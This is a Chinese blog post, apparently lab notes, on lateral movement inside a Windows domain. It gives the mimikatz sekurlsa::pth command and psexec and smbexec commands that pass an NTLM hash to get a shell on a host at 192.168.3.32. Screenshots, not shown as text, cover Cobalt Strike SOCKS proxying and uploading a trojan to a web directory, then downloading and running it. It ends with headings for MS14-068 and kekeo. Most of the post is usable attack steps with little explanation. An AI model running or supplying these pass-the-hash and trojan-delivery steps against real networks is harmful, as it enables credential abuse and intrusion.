目录

内网安全-横向移动PTH-哈希PTT-票据PTK-密匙Kerberos密码喷射

内网安全-横向移动&PTH 哈希&PTT 票据&PTK 密匙&Kerberos&密码喷射

一.域横向pth,mimkatz,NTLM

windwos server 2012 R2之前可能是NTLM和LM,之后为NTLM

1.mimkatz ptk

使用mimkatz进行横向移动

mimikatz sekurlsa::pth /user:administrator(目标本地用户名) /domain:192.168.3.32(目标ip) /ntlm:518b98ad4178a53695dc997aa02d455c(目标hash)

在执行命令机器弹出cmd窗口

https://i-blog.csdnimg.cn/direct/3de970b4117b4c0cb0e22e35ebb0d0e8.png

使用该命令进行传递木马

https://i-blog.csdnimg.cn/direct/98a8c59bc3d94a2182df6d5b7a34236a.png

https://i-blog.csdnimg.cn/direct/aedf562259a544e982f13f049e3807ca.png

创建bshell:

https://i-blog.csdnimg.cn/direct/63fad6add474413fa651eefcf25af04f.png

执行:

https://i-blog.csdnimg.cn/direct/659b94e94ca346229594cd661a61f225.png

在内网攻击机器进行hash传递

cs上配置socket节点

配置代理

https://i-blog.csdnimg.cn/direct/940b509375e54ba4a535c62e963dd1f7.png

https://i-blog.csdnimg.cn/direct/ee4406e6adc44c5dac4204b3f1390d91.png

使用psexec进行hash传递返回被控机器shell终端:

.\psexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

https://i-blog.csdnimg.cn/direct/bcbc357beda241a5b577360d735c924c.png

上线cs:

1.上传木马到web目录

https://i-blog.csdnimg.cn/direct/3a5c864ac82f4b81ad049e069e620c8a.png

2.使用cmd下载木马并且执行

https://i-blog.csdnimg.cn/direct/876d7b9b46a442ceab07c24fa00b5e9e.png

使用smbexec进行传递

.\smbexec.exe  -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

https://i-blog.csdnimg.cn/direct/a531fce796bd4d1fb0a8c0d80aaaf62c.png

2.pth-漏洞&kekeo&Ticks

1.ms14068

2.kekeo(高权限,需要NTGM)

https://i-blog.csdnimg.cn/direct/048f38063f17400bbb19e8c8fa7c8dc5.png